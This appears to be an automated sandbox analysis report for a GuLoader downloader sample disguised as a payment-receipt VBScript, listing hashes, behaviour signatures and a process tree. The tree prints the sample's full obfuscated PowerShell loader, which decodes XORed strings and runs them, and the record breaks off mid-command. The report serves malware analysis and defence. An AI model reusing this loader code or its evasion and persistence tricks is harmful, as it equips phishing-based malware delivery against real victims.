Overview

overview

10

Static

static

10

$RECYCLE.B...3D.exe

windows7-x64

$RECYCLE.B...3D.exe

windows10-2004-x64

$RECYCLE.B...L8H.js

windows7-x64

1

$RECYCLE.B...L8H.js

windows10-2004-x64

1

$RECYCLE.B...PRW.js

windows7-x64

1

$RECYCLE.B...PRW.js

windows10-2004-x64

1

$RECYCLE.B...R2U.js

windows7-x64

1

$RECYCLE.B...R2U.js

windows10-2004-x64

1

$RECYCLE.B...VCX.js

windows7-x64

1

$RECYCLE.B...VCX.js

windows10-2004-x64

1

$RECYCLE.B...3D.exe

windows7-x64

10

$RECYCLE.B...3D.exe

windows10-2004-x64

10

$RECYCLE.B...L8H.js

windows7-x64

10

$RECYCLE.B...L8H.js

windows10-2004-x64

10

$RECYCLE.B...PRW.js

windows7-x64

10

$RECYCLE.B...PRW.js

windows10-2004-x64

10

$RECYCLE.B...R2U.js

windows7-x64

10

$RECYCLE.B...R2U.js

windows10-2004-x64

10

$RECYCLE.B...VCX.js

windows7-x64

10

$RECYCLE.B...VCX.js

windows10-2004-x64

10

Tb2_paymen...df.vbs

windows7-x64

8

Tb2_paymen...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-03-2023 14:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Tb2_payment_receipt_pdf.vbs

  • Size

    304.0MB

  • MD5

    7f50ce31436aa43c5f650c5ba244606e

  • SHA1

    f07844cdad4a0c1286f38312169ac38e497662e5

  • SHA256

    4414b7a789914f859fc68e5a6e984fed0d4ee0068c1f2432a29d838efbf04179

  • SHA512

    949b2ff3e4ade813a6efd94aef292d420d5ae5582c3bf9521127829f99c59271f4758f31b2d4df7fd4288472cb561e4f30e115f5b0041e972848cfc816e3de3d

  • SSDEEP

    768:Zg+nD+EDiLl7higyKeOPqK8ntFYCTMMiKc5mKm2:ZgGFol0gPqK8fvTZcZb

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 1 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of FindShellTrayWindow 50 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Tb2_payment_receipt_pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Indkomst = """DFSu nDcAt i oAn nAa tHt e rNgTaNlR0 2l {L A p aSr a m ( [NSBtWrEiFn gW]S`$UoFb j e k tSg ls)O; B`$ TGn dMi nD = `$ o b j e kTtDg lG.ULAeMn gOt hS;R R`$ ATrpkAaOd eFr sM P= IN eSwT-wO bCjBeScKtN b yCt e [I]B ( `$ TTnDdCiPnT D/F Y2S)P;U S C N PF oBr (U`$BHKyEdFr oic u =S0N;V `$CH y dBrMoNc u P- l t `$KTKnAdIiSn ;s `$GH yNdIr oOcUuS+O= 2 )P{ M I K`$ T u rSg o r s cM2 0F1O P=g W`$ oPblj eOk t gRlP.FS u bSs t rGirnkgT( `$HHYyndSrOoMc uo,B 2 )V; N U A C`$RALrPkTa d eCr sT[ `$ Hrybdsr o cVuT/ 2M]c =K [PcMoSn vMe rDtW]H:K:CTSo BIyNt eV(M`$PTBuSrSg oGrSsEcG2G0M1 ,N 1 6P) ;S A k`$DA rAk aRdPePr s [S`$ H y d r oscKu /B2S] =B N( `$JAMr k a d e rBsG[ `$SHPyLd r omcOuP/R2C] R-ubbxSoNr R1O3C7 ) ;F H U} H[ SStDrniAnTgR] [RS y s tAe mg. TNeuxZt .EERnHcUoEdRiEnTgS]B: :kA SFCJIPIR. G eNt SOtFrWi nHgL( `$ A r kRaSdAe r sU)k;d}DS eSt - C oKnTtPe n tD D'TE :A\ n aRt t e rKg avlH0S3D' L' 2E' ;A`$ GSg eLh vaiKdSeVsPt =H IGcectT-BC o nTt eFn tS 'VE :F\FnBa tPtMe r gSaSlT0 3 'x;U`$rCDoNaNdBjS0a= nIa t t eNrSgUa lh0 2M T'RD ARFm0PFAASF DBEBCEE 4 AS7LEMD EL5NEU5C'V; i f B( `$BG g eShPv iGdCe s tS -BeAqA C' 2M'P) s{O`$ CPoFaCdGj 0K=P'E'R} ;G`$IC o a dMjK1 = n a tCtPeUrAgFa lM0r2T 'KC 4SEC0DEIACFUBAE 6AFPA ES6AEIF F D A 7 DVE EO0 EW7eBrADB B A 7UDSCHER7TF ASEE8RE F ESCCC 7 EP8KF DAE 0 F FREPCBC 4NE CHF DSEM1JEU6BE D FSAT'r; `$MCOo aPd j 2 =ZnDa tut e rgg aTlK0 2u 'OCDE E COFFD DP9KFDBME 6 E APCS8 EvDOEEDuFnBFEdC FLAPFWA 'M; `$MC oFa dCj 3K=In aMtmtPe rSgsaSl 0 2S R' D AAF 0 F AcF D E CRET4LA 7OD BsFUCkE 7AFBDOET0RE 4TEACSAL7SCK0BEB7 FSDPEcCKFRBLE 6 FS9 DJA ETCCFJBTFSF EG0BESASE CHF A A 7TCS1 EU8 EY7CE D EM5 EPC DTB EMC EKF 'D;F`$ CAo aBdGjA4r= nFaTt t e r gKaPl 0 2F ' FGA FPD FTBSEF0 EU7GEPE 'V;n`$SC oRaCdPjc5T= nSaBtUtWeIr gPaylL0 2H T'ECBE E C F D C 4KE 6 ESDCFmCSER5 EUC C 1 ET8 ES7GE D EP5 E CP' ;E`$FC oHa dSj 6G= nCaOt tReOrMgNa l 0 2M D'BD BUDKD D A FP9 ERCSEYAPEF0 E 8 ES5 Ct7AES8VER4EE CJA 5HAS9sCS1CEL0NE DSE CFCGBVF 0 D A E 0 E EJA 5 A 9VDN9MFTCBEABaEI5FED0TE A 'W;S`$ CFo a d j 7m=BnGa t tUeIrOgHa lC0S2 K'EDHBGF C EB7 FRD EC0VEt4HECCJA 5EAP9MC 4GE 8 E 7pE 8 EEE ETCRE DF' ; `$SC o aNdFj 8 = nBa t tTeJrhgoa lA0P2Q 'ZD BHEAC E FPEN5MEWCCEQA F D EACMEsDsCODCE CCE 5OEPCFEGECER8dFWDAE CL'D;l`$SC onafdPjA9P= n aOt t eHr gSa lP0J2S 'RCF0SES7 CM4 E CWES4FER6NFRBRF 0GC 4 EU6EECDDFFC E 5vEHC 'R; `$HeUv aSl u 0H=PnAaAtBt eTrSgOaMlF0U2b M'KCG4AF 0 CCD EAC EM5 EKC ETErEA8FFZD ESC DED Fi0vF 9EE CF' ;J`$LeUv aTl u 1B=RnsaFt tAeVrSg aVlV0S2L L'LCKA E 5FEP8 F AMF A AN5RAa9TD 9 F CuE BHEI5VEv0 ESA A 5OAN9 DAA EUC ES8 EU5BE C ESD AH5BA 9 C 8MED7TF AUE 0GCOArEF5KEV8PFBA FPA AP5TAF9SCB8 FOCAFEDME 6HC AAE 5OE 8AFGAUFFAN'T; `$BeSvca lTuM2M= nSaitDt eArAgFa l 0C2w P'WC 0aE 7SF FTEh6 E 2pE CA'D;E`$Fe vFaSlSuF3 =GnFaDtOt e rFg aFlT0A2B A'AD 9BFUC EBBOE 5 EU0RENA AL5 AS9 C 1 E 0 E D E CSCUBBFI0EDUAtE 0RE EFAN5SAa9 CF7 E C F E DRA E 5SE 6HF DIA 5FA 9 D FEEP0 F B FADKFpCDE 8HE 5S'T;S`$ e vsaFlBuf4S=fn a t tgeAr gBaHlH0D2D a' D F Em0 FOBUFTD FuC EU8NEO5 C 8 EK5HE 5OET6 EYA ' ; `$HeBvKaRl uS5h=Rn aPt tMeErLgCa lB0 2 P'NED7aFEDKEBD EA5BE 5S'P;I`$ ezv aMl u 6D= nKaDtVtIeErIg aTlM0K2E P'KCD7 FRDPDn9 FRBMEs6PF DFEDC ESAPF DFDFFCEB0KFKB FWD FLClEF8MET5uC 4HE C EC4XEK6UF BiFN0A'S; `$SeSv a lNu 7P=Un a t t e rpg aAlM0s2 K' CU0 CTC D 1D' ; `$ eFvMaSlMuT8P=un a t t ehrTg aHlO0 2 j'DDD5D' ;B`$ KDr uHmEmSeArPn eA2S3N7A= nRaSt tae rMgJaAlH0 2D 'VDtCWDSA CACSDhB BSALB BH'H;S`$BF rta v aFlm= n aBtFt eUr g a lD0A2b D' CAASES8AEL5 EN5SDBESE 0 E 7UE DRE 6CFPE DA9PF BkEa6 E AECC8R' ;tfDu n cNtUi oJn fGkUp {SPPagr aAmG U(O`$STSa dIpao lD,B `$OAmlSvIoVrMs )S R P S D M;m`$ t o m hFyApUhSeMnAsp0D = nTa t t e rYgUa l 0P2 ' A DTDKFIET0 E 5TEA2rEC8PEH8 F BFE 5BAR9UBn4 As9 Ap1 DP2PCA8 FR9 FM9NCDDAE 6tEU4FEP8 EL0 EM7PDP4LBI3MBM3VCCAuFBC F B F BKE CjEG7 FRDDCDD EU6REZ4 EP8cEA0GE 7 AM7 CCEDE C FODSC 8VFMA FIAMErC E 4 ERBREU5pEF0 EKCFFMA AT1SAA0TA 9PF 5JA 9CDtEVEH1HEEC FCBGEcC AS4 C 6 EEBTER3 ESC ECAAF DSAU9AF 2 A 9TA DJD 6WAS7 CDE EA5GEO6SE BPEU8 E 5 C 8IFPA FYASE CPES4 E B E 5PFR0 C A Ec8SE AJEM1 ESC AU9BA 4 CT8FEP7eE D AT9AA D Dm6 AG7 C 5VEC6DE ASEm8PFUDHEi0FEp6 EM7uA 7 D ALFS9UEU5FEU0RFBD AP1PAKD E CCFSF E 8 ED5SF C Bs1 A 0OD 2PAO4 B 8 DS4 A 7NCFC F 8MF ChEB8lET5 FFA A 1DA DTCBASEI6 ES8OE D ED3GBV9RA 0 A 9SF 4WAS0 A 7 C ETE C FKDDDGD FC0 FS9DECCSAu1 ACD CsA E 6OE 8LE D E 3 B 8BAF0E' ;N& (S`$eeBv aMl uP7 )T H`$RtDoPm hMyZp hHeDnTs 0S;I`$mtUoDmSh yVpPhBeLnUs 5 R= DnIaOt taeTrFgCa l 0C2H A' A DZCb5SF BSE CPEPBhE 6 E EFF AsFKAAAM9 BJ4OAB9 AED DFFDE 0BEB5 EB2IE 8 EB8CF B Ei5SAf7BCTEIE CGFFDICS4HEBC F D E 1 EP6NE DBA 1 AID CSA E 6 EC8 E DCEU3 B BVA 5RAS9 D 2 DCDTFU0HFP9GE C DS2GDT4CDT4 AO9ECI9 AM1PAdD C ASE 6 EE8HEPDAEa3rBIA AO5UA 9FA DaC AFEH6dEb8 EBD EA3CBUD AI0 A 0 'K; &U(K`$ e v aRl uT7A)D L`$ tLoGmKhTyLp h eTn sS5 ;D`$ tPo m heyBpHh e nDsi1S = n a tAtCeAr gAaMlS0S2H d'TFAB E CRFADIF C FABAE 7 AM9IAFDDCM5AFKBOEAC E BAEP6 E E FFARF AKA 7 C 0SEF7 FJFIEr6DEp2PEDC AO1BARD EB7PF CGET5PET5SAS5KAD9 CT9AAT1 DI2DDLA FL0 FHA F DEEDCAET4FAJ7BDBB FKC E 7 FYDIES0 E 4 EIC AL7aC 0NE 7LFBD E CUF B ES6pF 9 DAA E CDFRBTF FTE 0BELAHE C F APAU7 CA1CE 8KEI7 E DPED5FEDC DGBCE C ESFSD 4 AI1 C 7PEDC FDE AD4ICT6KEABSE 3BEKCBELA FGDpAB9bDEATF 0 FTAPFLDFE C ES4PAF7SD BMF C Ec7EF DrES0 EP4 EDCnA 7 Ck0PE 7SF D E C F BBE 6 FV9NDPA E COF BDFRFEE 0 EHAPEiCTF ASAh7ECI1 EA8pEG7UE D ES5 E CMD BSEICTE FTAO1 AK1 CB7TE CTFSE A 4CC 6MEFB ET3SE C ETA FPD Ae9 Ce0 Es7 FAD D 9MFKDBF BPA 0MA 5SA 9RA 1PA D DMFIE 0 ES5OEB2nE 8 ED8 F BdES5HA 7 CMEOE CbFTDSC 4AEKC FMD E 1 EH6OEID AS1 AaD CDAjEH6SE 8 E DtEB3 B C AF0 AA0 A 7 C 0 ES7 FTFIE 6DED2UE C AS1 ABD E 7 FFC EO5ZER5MAC5TAA9IC 9LAB1 AKDGDFD E 8LE DTFH9 E 6 EC5 AF0 AU0FAH0IAS0 AE5 AL9SARDCCP8KED5 FBF E 6 FOB FGACA 0 A 0B'B; &O(T`$fepviaslSu 7N)V D`$CtFoVm hSyApLhsesn s 1P;D}SfAu nCc tGisoSn CGBDUTM {DPTaMr a m C( [ P aNrua maeFt eErC(UPIoVsPiTtTiHoSnE m= 0H,C OM aTnIdHa t o rFy A=B `$ TDruuUeC)H] s[aTPyKp e [ ]D]P p`$ULBeFv nDe ,L[ PAaKrSaMm eOt e rT( P oVsOi t iHohn = W1 ) ]N [ T yIp eK]P `$ p r e zOoPnVa H= E[RVBo i d ]A)M; `$ t o m h yGpIh e n sS2 B=V EnSa t tNeUrHg aPl 0 2M 'oAODPCD3 E CHF C E F E 6 FIBAAR9 BA4DAT9PDC2JCS8KFN9 FV9 CgD E 6WEL4 E 8 E 0HEA7BDR4 BU3 BA3VCLA F CPFUBPF B ELC EP7 F D CODVEP6TET4 E 8 ED0GEC7 Au7EC DFE CDEAF EO0 ER7FE CICHDSF 0 EF7 EN8 EF4SEO0SE ASC 8 FSA F A ETC E 4AELBOEF5AFT0 AI1AA 1 CR7aESCCFME A 4 C 6SE B Ed3vE C EBA FPD A 9EDBA Fa0PF A FKDNE CWEs4DA 7HD B ENC EGFSE 5AE C EAAiFFDaE 0SE 6 E 7aA 7JCO8IF AUFKA E CAES4GESB E 5LF 0 CU7NEB8REK4 E CTAB1TAUD CLA EH6 EP8UE DNE 3LB 1BAU0KAB0CAS5HAS9HD 2 DRA FR0HFYAFF DNE C E 4IAl7 DGB ESCAE FCEP5 ERCBE A FWD Es0 E 6PE 7CAv7 C CPE 4 E 0SFBDLAS7SCB8KFEArF A E CSEW4 E BCE 5LF 0BCFB FUCTES0GEO5 EBDSEUCDF BDC 8DESA EbAFECCfFOA FIANDW4 B 3 B 3 D BEFGC ET7sAI0 A 7 CFDDETCRE FFEf0 EV7 E CSC D F 0 E 7NE 8FER4PE 0GEOA C 4 EU6AEADAF CFEB5 E C AY1AA DRCUA EM6 EL8MEOD E 3GB 0BAG5LAE9BAMDAEKFGEU8uE 5 F A E CiAH0TA 7DCHD EPCUEAF E 0OE 7LE C DADVFK0GF 9 E CCAs1OA DPE C F F E 8NEC5AFMC B 9KAR5 AR9PA DPE C F FKE 8 E 5 FVCSB 8CA 5NAS9UDH2 D A Fk0BFSAFFEDdE CSE 4 A 7DCs4HF CPE 5AFBDHE 0CE AIEK8 FPATFSDACVDDE CLE 5tECCAESEDE 8 FRD EHCADG4MAN0 'P;D&P(L`$ esvPaClCu 7S)I T`$StGoTmFhTy p h eGnTs 2C;L`$EtRoBm h y p h eBn sC3D C= PnUa t tueHrPg aAlB0 2 U' A DRC 3SENCMF C ETFME 6HFPB Ac7 C DPEECKEAFBES0UEB7ME C CiABES6RER7OF AgF D F B F CCEDA F DOEK6 FJB AN1 AUDKC ARE 6 E 8PEPDEE 3 BBF A 5AAB9SD 2BDKA FF0FFNArF D EOCPEC4KAV7NDrBSEHC E FKEG5UE C EsA FKD ED0kEN6DED7 AU7 CAABES8REU5EEe5GE 0mE 7 EJE CDA EY6AE 7 FTF ECCQE 7FFDDVE 0TE 6BEE7UFFA DC4 BP3sBM3LDlA F D EA8TEC7PE D EK8KFKBPE DaAS5 AN9 AgDAC 5sE CMFBF EU7REUCPA 0 AP7 DKAPE CPFcDiCA0 E 4OFR9EEU5 EFC E 4FEAC E 7 FAD El8 FPDNEE0NE 6 EF7 CTFKEP5SEE8 E EHFdATAS1EAFD CEATEF6AE 8SE DCE 3 BAE AF0 ' ; &P( `$ eAvBa l uR7C) D`$ t o mKh ySp hSeUnSsS3s;S`$StJo mDhNy pAhCeSn sK4F O= snMaFt tNe r gKaTl 0 2R A' ASDUC 3 ELC FOCKE F E 6 F B AC7SC DPE C E FGER0AEA7 E CDCS4MEPCBFUDPE 1DES6 EMDOA 1GA D EFCNF FbEF8HEF5UF CsBsBEA 5 A 9SA DCEaCHF F EK8 E 5 F C BEA AU5PAF9 AcDOFA9 F BSE C FD3 E 6 E 7VEC8uA 5TA 9 A DUCI5oEDC FtF EL7TEUCSAF0KAG7NDSA EBCCFBD C 0BE 4OFH9 Ek5SE CFE 4 E CPES7KF DFE 8 F DNEi0AEA6bEO7SCLFFEO5AE 8EEBE F ACA 1SA DHC A Ea6BE 8 EKD Et3AB ETAN0 'A;K&S(U`$Te vWaLlmu 7P)E R`$Kt oHmPh y poh eSnFsp4G; `$ tLoHm hPy p h eEn sA5S S=K EnMaUt tmeMr g aalS0 2R 'sF BsE C FUDPFBCAF B EU7FA 9 A DUC 3bERC F C ETFPEI6PFAB AO7OCRAFF B E C EF8rFADSEZCUDSD FN0 F 9KENCDAT1DA 0F' ; & (D`$Se vFaGlSuP7 ) S`$AtUoMmPhBy pChIesnUs 5U H U;O}F`$IS aDySaSb l eM B=o cnMaEt tJeSr g aBl 0S2C O' ES2 EACSFSBDEO7UE C E 5 BDABB BE'H;B`$Tt o mSh yGpCh eTnBsD6B P= nLaktVtLe r gAa lS0 2 R'KAED C FKE 5OE 8 ERBTE C Ep5 ER5QES0BET7VE CFAG9SBT4FA 9CD 2 DDA FC0 F ARF DUEEC E 4AAP7SDDB FIC ED7HFDD E 0RE 4 E CSAP7 CN0SE 7CFTDUE CSFBBSEC6bFN9 D A ETCTF B F FBEu0 EDAAEEC FAA AJ7PC 4FEg8EF BDFSALEr1PE 8 Et5OD 4 BB3WBC3GC E E C FNDDCMD EOCPEP5rEMC E ECE 8 F DUETCSCaFUE 6 F B CEF FSC EB7 E A FaD ET0sEA6 E 7BD 9 EF6DEM0SEB7AFDDIEACHFJBSA 1CAL1 ECF E 2AFL9 AU9hASD DTASEJ8 FD0GES8SELBFEB5 ECC AT9 ACDEEJC FRF ES8 EK5 F CKBEDBAS0MA 5 A 9DAB1SC EAC D DCDBA 9 C 9BA 1BDA2NCK0 ED7GF D D 9OF D FsBBDM4GAU5 AS9SDV2FD C C 0SEW7CFFDGBPAUBUB DE4fA 5 Ar9vD 2VDFCTCT0 ER7 F DRBPA BPBBD 4 AS5CAS9 D 2 D CTCT0SEE7 FSD BTAABTBNDS4 A 0 AS9DAB1 D 2SC 0 EV7bF D Ds9DFKDBF B DH4TA 0FAT0 AV0P'P;M& ( `$ eSv aPlMuM7p)r `$Tt oCm hFyTp hSe n s 6T; `$TBLeSn t h oMsFc o p = Uf k p U`$Ke vMa lBuA5S `$seAvSa lVuA6 ;S`$Gt oSmFhmy p hReInUsK7 B= nIa tGt eHrHg aMlA0g2a 'AADDBD A EB2 E EPE CPBSABA 9RBG4DAP9DASDBCiFBED5TEE8 E BPESCSE 5 E 5MEG0PE 7 E C AK7 CG0 En7 FaF ES6 EV2SE CSA 1 DK2 CD0 EI7 FRDTDB9 FTDAF BGD 4GBP3 B 3 DJ3LEPCOF B EC6UAD5 AM9ABBF B ChBV0KAS5RAK9 BL9uFD1UBKAPB 9 BC9UBK9 A 5 A 9IB 9 Ff1 B D B 9GAK0 ' ; & (P`$AeDv aElEuF7C)J S`$StsoImFhDy p hOe nDs 7 ;D`$BtToAmShgyEpkh eAnOs 8 = PnCactDt e rTg aKlB0p2B A'MA DSC BPF B FSC E 7 ET0MFU3CE CBE 4 E A EA1SA 9GB 4 A 9JAHD C FJE 5OE 8DE BSENC E 5 EP5TEK0 E 7 E CSA 7HC 0PEU7SF FCES6AE 2SE COAG1 DM2 C 0 EB7 F D DL9 FADCFPBFD 4OB 3 B 3ED 3HEAC FABhE 6KAC5 A 9 B DIBSB BlC B 9 BF9NBS9UBN0MBSFKAm5 AF9ABT9 F 1 BKA B 9ABb9TBV9NA 5SAD9 BC9MF 1 BTD A 0R'P;V&T( `$Se vIaMl u 7 ) `$ tSoNm hDySpUhSeRnNst8U;A`$ n a t tTe rTg aAlF0B1 S= En a tVtNeSr gma lU0R2 ' E 1 FhDSFFDSF 9bF AVBV3 A 6 A 6FE EPEG6bF F FTD E 3SE 6 E B E D E 8 FS0BAP7HEG0HEN7 AM6 ET8VEUD ES4 E 0FE 7BA 6 ESB F B EH6KED7CEAA EC1IEY6SF BPFgB EG1SA 7kESAJE 1 EB4D'C;S`$ nUaAtMtOe rag aMl 0D0h =S BnTaBtTt eTrggRa lW0 2 t'CA DGCS6UFSBMEGDIEP7 A 9 BN4SAP9VAS1HCS7DETC FVE Ad4 Cb6 ELBTEA3 EECUENA FPDUAU9 CG7UE CHFPD A 7HD E E CCE BUC ATE 5PE 0 EfCTEA7 FKDSA 0 AA7 C DEE 6 F EDEB7SE 5 EO6PE 8 E D DTAAFPDFFSBBE 0 EL7 EFE AK1SA D EO7RE 8KF D FZD E C FBBUEDEAE 8 EF5 BP9 B 8PA 0 'S;F`$ tNoSmShDyBpfhfe n s 8 S=R nPaUt t e rFgYaKlT0 2G O' ASDUDbACE 2VEFE ERC BSB BU4RAcDCESC E 7FF FCB 3HES8DF 9 F 9 ESDFE 8 FSDSE 8P' ;S&U(V`$NeHv aml u 7 ) q`$ tSo m hTyHpEhSeFnRsF8 ;K`$MSVkFg eC2 = `$US kLg eW2h+ 'Q\ M a sLkLiS.SSUa nB'M; `$ ORr d n = 'l' ;OiBf B( -GnSoEtM(BT eTs t -sPYabt hB D`$FS kVgTeA2T)S) U{MwUh iEl eI (f`$ O rudKn - eTq E'R' ) S{C& ( `$Ue vPa lgu 7 ) `$In aPtUtTeArNgKaFlA0T0 ;HSSt aFrMt -MS lleEeUpW B5U;p}sS eTtD- CMoTn tAeDn ta `$ SUk gMe 2P `$ O r d n ;E}S`$FO r d nG = G eGtG-SC oUn t eEnEt A`$ SKk gVeL2 ; `$Pt oSmKh y pUhAeFnUs 9I S= Rn aEtTt eSrSgOa lf0 2 R'CA D F DMEC6DE 4 EG1 F 0LFM9 EM1 E CKEA7DF ALA 9 BS4GA 9 DJ2iD A F 0TF ACF DGEICSEE4FA 7HCSAUE 6 EC7 FHFIEOCRFLB FNDSDI4PB 3 B 3SCDFFF B EG6GE 4oCSBLE 8DFBAmE CPBSFKBPD D A FPDDFSBVER0CER7 EME A 1 AGDLC 6dFRBiESDDEM7 A 0G'S;W& (D`$EeFvRa l uB7G)D P`$ tSodm hDyppAhAe nAsX9C;K`$ROHrUd n 0 V=B Sn a tUt e rFgcaOl 0 2 ' D 2 D ARF 0 F A FFD E CRE 4 AS7SDTB FDC E 7 F D E 0BEL4 EHC AV7 C 0 EI7SF DFEECKF BJEF6WFc9CDmA ESCFFCBHFEF ES0 E ASE CpFIA A 7 C 4JEA8 F B FQASE 1 E 8KE 5FD 4FBF3 B 3 CPAOE 6 F 9PF 0 A 1SA DSFDDCE 6 EK4AEO1OFA0PF 9EE 1 EGCHE 7SFuA A 5bAM9TBT9KA 5 A 9 AY9FAPD DOACE 2tEgE EBC B A A 5PAS9 BSFTBACKB 0QAR0A'T; & (S`$SeBvPa lSuB7R) k`$ OHrFdLnv0 ; `$ SKaSa dJaPnS=U`$HtPo mRhBySp hOeMnPsM.ScToTuKn tG- 6 5K9 ; `$TOEr dMnL1 =R In ast tNe r g a lM0C2A ' D 2CD AOFS0SFSAFFCDiE C EG4 AT7LD B FBCFEC7KFED E 0 EH4GE CFAF7 Cc0BE 7RF DMESCPF BSE 6 Fg9 D A E C FTB FSFSEB0SE A E CBF ASAS7uCN4AEA8CFMBIF A E 1SES8 E 5 Di4DB 3 BC3FC ASEU6FFL9 FP0FA 1IAFDSF DMEF6NEI4 EM1 FF0GFH9EEs1 ELCIE 7HF A AS5 A 9 BBFBB CTB 0MAS5UAh9CA DCC BNFCB FRCOE 7 E 0SF 3 EACREC4SE ABE 1 A 5BA 9OAUDBDfA EI8AEL8SE DFE 8 EN7IAF0 'H;L& (F`$Be vEa l uU7 )S L`$ OMr dKnT1 ;D`$ O r d nV2J D=H Rn aFtMtUe r g a lL0L2R D'FA D CEC F 9HEC0 F DUE 1PE COE 5SAF9 B 4 AC9 DS2SDJAGFS0 FHAUFTD ECCDE 4 A 7 DXB FOCNE 7 F D EP0 EP4 E C AM7HCR0CE 7 F D E CRF BHER6 F 9BD ATE C FCBRFSFGE 0 ESASETCUF AMA 7SCF4 E 8AF BTF AOE 1KEC8 EE5GDN4 BP3 BA3sCAEAEBCAF DCCJDhERCFES5HEAC EPEDEF8PFODFEUCOCEFHE 6SF BMC FBF C EG7EE ARFVDKES0SEF6 ET7 D 9DE 6 Ea0REM7IFRD E C F BNA 1 AF1 EIFDE 2TFS9CAS9 ABDSCA2mF B FSCAET4 E 4 EYCAF BCE 7REPCGBPBFBRA B E AE9MABD CCFAF BSED8BFNFDE 8 E 5 AA0FA 5TAI9AA 1IC E CPDGD D A 9 C 9UA 1AD 2 C 0 EO7OFPDEDr9HF DOF BBDT4LAN5 AE9 DV2 CI0 EA7VFVD D 9 FMDVF BMDk4 A 5PA 9 D 2GC 0 E 7 FFD D 9 F D F BTDC4PA 5DAR9FDP2ECS0 E 7 FJDRD 9SF DLFAB DR4 AT5 As9CDF2OC 0 EA7PFSDKD 9CF DBF BuDO4 A 0AAB9PAT1 D 2OC 0 EN7LF DDDB9 FTDHF B DO4 AT0 AM0lA 0 'I;O& ( `$Ge v a lauD7 )F d`$CORrTdSnD2 ;s`$KOPr dAn 3E S= GnTaftAt e r g aBlO0N2 ' A DFC CWF 9lE 0TFSDPEP1KE CpE 5AA 7TCC0 E 7QF FSEJ6CEV2BE C A 1 AUDbD ADEG2 ECEFEAC B AFAB5FA DAC B FSBDF C EK7TE 0HFB3PEMCSET4 E AUE 1 A 5DAPDCCFBME CMES7UF D EO1 E 6PF ASEKAAEM6 FB9PAB5 Bs9 A 5 B 9RAM0 'O; & (U`$FeCvSa l u 7S) `$ O rKd nL3 # ;""";Function Ordn9 ([String]$objektgl) { For($Hydrocu=1; $Hydrocu -lt $objektgl.Length-1; $Hydrocu+=(1+1)){ $nattergal = $nattergal + $objektgl.Substring($Hydrocu, 1); } $nattergal;}$Skiliften0 = Ordn9 ' ISE Xu ';$Skiliften1= Ordn9 $Indkomst;if([IntPtr]::size -eq 8){.$env:systemroot\S*6*\W*Power*\*1.0\po*ll.*xe $Skiliften1 ;}else{&$Skiliften0 $Skiliften1;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:180
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function nattergal02 { param([String]$objektgl); $Tndin = $objektgl.Length; $Arkaders = New-Object byte[] ($Tndin / 2); For($Hydrocu=0; $Hydrocu -lt $Tndin; $Hydrocu+=2){ $Turgorsc201 = $objektgl.Substring($Hydrocu, 2); $Arkaders[$Hydrocu/2] = [convert]::ToByte($Turgorsc201, 16); $Arkaders[$Hydrocu/2] = ($Arkaders[$Hydrocu/2] -bxor 137); } [String][System.Text.Encoding]::ASCII.GetString($Arkaders);}Set-Content 'E:\nattergal03' '2';$Ggehvidest = Get-Content 'E:\nattergal03';$Coadj0=nattergal02 'DAF0FAFDECE4A7EDE5E5';if ($Ggehvidest -eq '2') {$Coadj0=''};$Coadj1=nattergal02 'C4E0EAFBE6FAE6EFFDA7DEE0E7BABBA7DCE7FAE8EFECC7E8FDE0FFECC4ECFDE1E6EDFA';$Coadj2=nattergal02 'CEECFDD9FBE6EAC8EDEDFBECFAFA';$Coadj3=nattergal02 'DAF0FAFDECE4A7DBFCE7FDE0E4ECA7C0E7FDECFBE6F9DAECFBFFE0EAECFAA7C1E8E7EDE5ECDBECEF';$Coadj4=nattergal02 'FAFDFBE0E7EE';$Coadj5=nattergal02 'CEECFDC4E6EDFCE5ECC1E8E7EDE5EC';$Coadj6=nattergal02 'DBDDDAF9ECEAE0E8E5C7E8E4ECA5A9C1E0EDECCBF0DAE0EEA5A9D9FCEBE5E0EA';$Coadj7=nattergal02 'DBFCE7FDE0E4ECA5A9C4E8E7E8EEECED';$Coadj8=nattergal02 'DBECEFE5ECEAFDECEDCDECE5ECEEE8FDEC';$Coadj9=nattergal02 'C0E7C4ECE4E6FBF0C4E6EDFCE5EC';$evalu0=nattergal02 'C4F0CDECE5ECEEE8FDECDDF0F9EC';$evalu1=nattergal02 